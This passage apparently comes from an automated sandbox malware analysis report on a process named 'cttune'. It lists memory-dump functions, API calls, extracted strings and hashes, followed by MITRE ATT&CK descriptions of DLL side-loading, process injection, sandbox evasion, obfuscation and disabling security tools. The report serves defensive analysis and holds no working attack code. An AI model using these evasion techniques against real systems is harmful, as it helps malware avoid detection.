Opcode Fuzzy Hash: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction Fuzzy Hash: 26E09ABA620304BBDA10EE58DC45F9B77ACEFC9750F004409FE09AB241D670B9118BB8

Function 03259980 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4E8B0446,00000007,00000000,00000004,00000000,03244092,000000F4), ref: 032599BF

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction ID: 054757f642c1c2e910722c002bd2440c7a7eb6d1c0d39107f4cc4933b5fca921
Opcode Fuzzy Hash: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction Fuzzy Hash: A0E06D76610304BBD610EE58DC41F9B37ACDF85710F004009FE08AB241C770B91186B4

Function 03248600 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0324862C

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b085c912700a13a5ea0e5ecfa31ff90c4c11c70246546c558087bd4eeebd270e
Instruction ID: 333b1f33ba7ed1715aa3b7ee3fa5c7e98525fa247513c3e673cd85aa802be99d
Opcode Fuzzy Hash: b085c912700a13a5ea0e5ecfa31ff90c4c11c70246546c558087bd4eeebd270e
Instruction Fuzzy Hash: D1E0267167030827EB28EAA8DC41F6233489B48664F5C4660BA2CDB6C1E9B9F5828164

Function 032483E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03241FF0,0325819F,0325585E,03241FB6), ref: 03248423

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2d5bcbfba28a3a395452388389b68bb610f3028c0e92ba85e8a034c8e46786cd
Instruction ID: da9b6a9a41471f8904d21c0773ed7d882bf662d592f598bf562b09360007a935
Opcode Fuzzy Hash: 2d5bcbfba28a3a395452388389b68bb610f3028c0e92ba85e8a034c8e46786cd
Instruction Fuzzy Hash: 77E0CD757703053FE711E6E4DC41F7923885744754F154074BB08EB1C1D561B15286A5

Function 032483F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03241FF0,0325819F,0325585E,03241FB6), ref: 03248423

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 77a7ae2053aca9a341e1a0b427c3bcb6d491eb1123e6fcf2fa57344fe658b3a2
Instruction ID: 2453490babff91401ac164ec136057f65f17f3b6aa3161f6a5ec3403fc5a4f76
Opcode Fuzzy Hash: 77a7ae2053aca9a341e1a0b427c3bcb6d491eb1123e6fcf2fa57344fe658b3a2
Instruction Fuzzy Hash: EAD0A7B56B03043BFB00F6E5DC02F26328C9B04694F198078BB0CFF2C1E8A5F15185A9

Function 05292C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292C24

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 52a171d69c60f0daf170f36b96317d3f5bd73d4324a4433f5f89ecd1d0b16678
Instruction ID: 115a70ea7010094f31c12b5448f59e075fe71dfd93287ebca0f0c67de412edd1
Opcode Fuzzy Hash: 52a171d69c60f0daf170f36b96317d3f5bd73d4324a4433f5f89ecd1d0b16678
Instruction Fuzzy Hash: 44B09B73D115D5D6DE15E7604608B1779117FD0701F56C061D3070651F4778D1D1E1B5

Non-executed Functions

Function 051004E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2978930633.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5100000_cttune.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202ebef0d8c039989ee18434e0faddfcabfb8218267051ed4830149620cc5829
Instruction ID: fc64e89beef1f5a1de6a9020af7c1d854c75447042ec46682710ab3582fb6415
Opcode Fuzzy Hash: 202ebef0d8c039989ee18434e0faddfcabfb8218267051ed4830149620cc5829
Instruction Fuzzy Hash: D341B57061DB0D4FD368EF699085776F2E2FB89300F50162DD98AC3292EBB4D8468785

Function 0510DD99 Relevance: 56.5, Strings: 45, Instructions: 212COMMON

Download Yara Rule

Strings

123@, xrefs: 0510DE98
@@@@, xrefs: 0510DF1D
@@@@, xrefs: 0510DED7
<=@@, xrefs: 0510DE28
@@@@, xrefs: 0510DEAD
@@@@, xrefs: 0510DF55
@@@?, xrefs: 0510DE13
@@@@, xrefs: 0510DE67
@@@@, xrefs: 0510DEA6
@@@@, xrefs: 0510DF0F
@@@@, xrefs: 0510DF5C
@@@@, xrefs: 0510DEFA
@@@@, xrefs: 0510DEE5
@@@@, xrefs: 0510DF6A
%&'(, xrefs: 0510DE83
@@@@, xrefs: 0510DF32
@@@@, xrefs: 0510DF7F
@@@@, xrefs: 0510DEC9
@@@@, xrefs: 0510DF63
@@@@, xrefs: 0510DF01
-./0, xrefs: 0510DE91
@@@@, xrefs: 0510DEF3
@@@@, xrefs: 0510DED0
@@@@, xrefs: 0510DF40
@@@@, xrefs: 0510DE9F
@@@@, xrefs: 0510DEEC
@@@@, xrefs: 0510DEB4
?, xrefs: 0510DF90
@@@@, xrefs: 0510DEBB
@@@@, xrefs: 0510DE2F
@@@@, xrefs: 0510DEDE
@@@@, xrefs: 0510DF24
4567, xrefs: 0510DE1A
@@@@, xrefs: 0510DEC2
!"#$, xrefs: 0510DE7C
@@@@, xrefs: 0510DF2B
@@@@, xrefs: 0510DF39
@@@@, xrefs: 0510DF47
@@@@, xrefs: 0510DF16
@@@@, xrefs: 0510DF08
@@@@, xrefs: 0510DF4E
)*+,, xrefs: 0510DE8A
@@@@, xrefs: 0510DF78
89:;, xrefs: 0510DE21
@@@@, xrefs: 0510DF71

Memory Dump Source

Source File: 0000000B.00000002.2978930633.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5100000_cttune.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: a285dd3379b611f52df1049f68d4609f0046b3671128ea88421c99d7784038de
Instruction ID: 6fe58edae4e6e4aa599fb156d9ccaa17222c06abff36a764389ad5b08608ba6e
Opcode Fuzzy Hash: a285dd3379b611f52df1049f68d4609f0046b3671128ea88421c99d7784038de
Instruction Fuzzy Hash: D79161F04082988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85

Function 05292890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0529293C
___swprintf_l.LIBCMT ref: 0529295E
___swprintf_l.LIBCMT ref: 052929A3
___swprintf_l.LIBCMT ref: 052CA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 052CA54E
:%u.%u.%u.%u, xrefs: 052CA5B8
ffff:, xrefs: 052CA504
::%hs%u.%u.%u.%u, xrefs: 052CA527

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: aa69cdf2d60a3fda130659a70fb336be9f31f0cbfbbca6d7d1dd7049367c1b92
Instruction ID: 37848106ee8fd92345f9e08950619f2130c28ac5919ef8f9eb6176de056b1d74
Opcode Fuzzy Hash: aa69cdf2d60a3fda130659a70fb336be9f31f0cbfbbca6d7d1dd7049367c1b92
Instruction Fuzzy Hash: AF51C5BAA24117BBDF24DB98889097EFBB9BF08240B50C669E499D7741D374DE4087E0

Function 05302410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 053024A6
___swprintf_l.LIBCMT ref: 053024E2
___swprintf_l.LIBCMT ref: 0530257D
___swprintf_l.LIBCMT ref: 053025A3
___swprintf_l.LIBCMT ref: 053025C8
___swprintf_l.LIBCMT ref: 05302608

Strings

::%hs%u.%u.%u.%u, xrefs: 0530249E
ffff:, xrefs: 0530247D, 0530249D
::ffff:0:%u.%u.%u.%u, xrefs: 053024DA
:%u.%u.%u.%u, xrefs: 053025FF

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 524a4cc9d017a482e392474aed3d51c5eb61382361212565f647ce13c9b8d914
Instruction ID: d774695881216bd9c8a2017ecf2d0f92427712c6ffbd94ee650a21789c42c783
Opcode Fuzzy Hash: 524a4cc9d017a482e392474aed3d51c5eb61382361212565f647ce13c9b8d914
Instruction Fuzzy Hash: 1751D479A00745AFCB34DF5CC8A897FF7FAAF44200B44985AF496D7681E6B4DA408B60

Function 05287630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 052C4787
ExecuteOptions, xrefs: 052C46A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052C46FC
Execute=1, xrefs: 052C4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 052C4655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 052C4742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 052C4725

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 78bf92ca51b8c232e60ce571cf0cdd4163ab0192d50ec3d67d6b530c658eb6e3
Instruction ID: 52634b18e83dcd56732b44279acf64b5695aa654723efcfb5ec1f0a35f20f0f9
Opcode Fuzzy Hash: 78bf92ca51b8c232e60ce571cf0cdd4163ab0192d50ec3d67d6b530c658eb6e3
Instruction Fuzzy Hash: A35118356212197AEF10FBE49C9AFBA77A9FF04304F180099D50AA71D1DB729A45CE60

Function 0529B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0529B6BF

Strings

0, xrefs: 0529B695
+, xrefs: 0529B65A
0, xrefs: 0529B66F
-, xrefs: 0529B650

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 9acb2dde03fa6d84cc137ba89edc3bb3039b112ce4df786b7a304f34e827932b
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 2581A175E2D24A9EDF2CCF68E8917FEBBA2BF45310F184219D895A7390C7749840CB51

Function 053020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0530214F
___swprintf_l.LIBCMT ref: 05302172

Strings

%%%u, xrefs: 05302146
[, xrefs: 0530212B
]:%u, xrefs: 05302169

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 60344ccd7ef4c9a3908daf65603ea97b3d8dd3a0326b3418e06cc1433fe3396b
Instruction ID: 050f6fbb03c9ce32c2fbfdaaf775d5f11273cf1244fba47dbb2cea13f85ddebd
Opcode Fuzzy Hash: 60344ccd7ef4c9a3908daf65603ea97b3d8dd3a0326b3418e06cc1433fe3396b
Instruction Fuzzy Hash: 1521747AA10219ABDB14DF79CC58AFFBBF9EF54644F040116F905E3240EB70D9018BA1

Function 0527F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052C02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052C02BD
RTL: Re-Waiting, xrefs: 052C031E

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 12acd6a84d69061b44131ee4db2de289acdcca3726bb8ab14b4ed985176824bd
Instruction ID: 6b28860025a478be68a9f421b55c659a9b9b6dbec914b7547268c4e92943ab0e
Opcode Fuzzy Hash: 12acd6a84d69061b44131ee4db2de289acdcca3726bb8ab14b4ed985176824bd
Instruction Fuzzy Hash: 17E1B130628746DFD725CF28C988B2ABBE1BF84314F140A5DF5AA8B2D1D774E944CB52

Function 0528BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 052C7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 052C7B7F
RTL: Re-Waiting, xrefs: 052C7BAC

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 47bee25955cc9170c27b83526c6092b21c88accb02b66f71ef9a68dc6ab25a15
Instruction ID: 1b1ab5de61cfee4f8e68d8e97ba663797515caf40793025a413792550027c689
Opcode Fuzzy Hash: 47bee25955cc9170c27b83526c6092b21c88accb02b66f71ef9a68dc6ab25a15
Instruction Fuzzy Hash: 1741D0357267029FC724EE25C844B7AB7E6FF98710F040A2DF85A9B681DB71E4058B91

Function 0528B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 052C728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 052C7294
RTL: Resource at %p, xrefs: 052C72A3
RTL: Re-Waiting, xrefs: 052C72C1

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 29abab3992ec511d05d984d22fb7751dc0964edab610fbe2279295bfe8e2dd03
Instruction ID: 7da780f0d4037c8f40bd1daa460e7267480b72ed2c458f4e6c130db8181ac191
Opcode Fuzzy Hash: 29abab3992ec511d05d984d22fb7751dc0964edab610fbe2279295bfe8e2dd03
Instruction Fuzzy Hash: 8341DE35725602ABC721DE65CC46F66BBA6FF44710F18061DF85AAB381DB31E8068BD2

Function 05302300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0530238D
___swprintf_l.LIBCMT ref: 053023B3

Strings

]:%u, xrefs: 053023AA
%%%u, xrefs: 05302384

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 67b6daba4dad04400f37f01d2bc065cfb2c6684ea0eb511b40e1b000fcc5c7ec
Instruction ID: 1269f1047eea74c8738ad537fec49a63b50094b7bf6d08f2aac0431c7c905200
Opcode Fuzzy Hash: 67b6daba4dad04400f37f01d2bc065cfb2c6684ea0eb511b40e1b000fcc5c7ec
Instruction Fuzzy Hash: 74317376A102199FCB24DE69CC54BEFB7A8BF44610F445595F849E3280EB30AA448FA0

Function 05297D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05297E8B

Strings

+, xrefs: 05297DE8
-, xrefs: 05297DDD

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: fac96266df2f22bcb1a85b377734d010989fa2bfa28ee2efa6e27d2cee74c51a
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 72919370E342169BDF2CDE69C881ABEB7A6FF46720F1C451AE859B73C0D77099418760

Function 05259126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 05259175
$, xrefs: 05259191

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: fd9c83e286e74e75c4d7cf81d8f4b10b690f669eba71a08db79f1d584ed4c808
Instruction ID: 04e70185e052802fb888be673a172bc8c482af8c113c1f7c9f669ef33d99a7b4
Opcode Fuzzy Hash: fd9c83e286e74e75c4d7cf81d8f4b10b690f669eba71a08db79f1d584ed4c808
Instruction Fuzzy Hash: 2F811AB5D20269DBDB25CB54CC45BEEB7B8AF08750F0041EAA91DB7240D7709E84CFA4

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

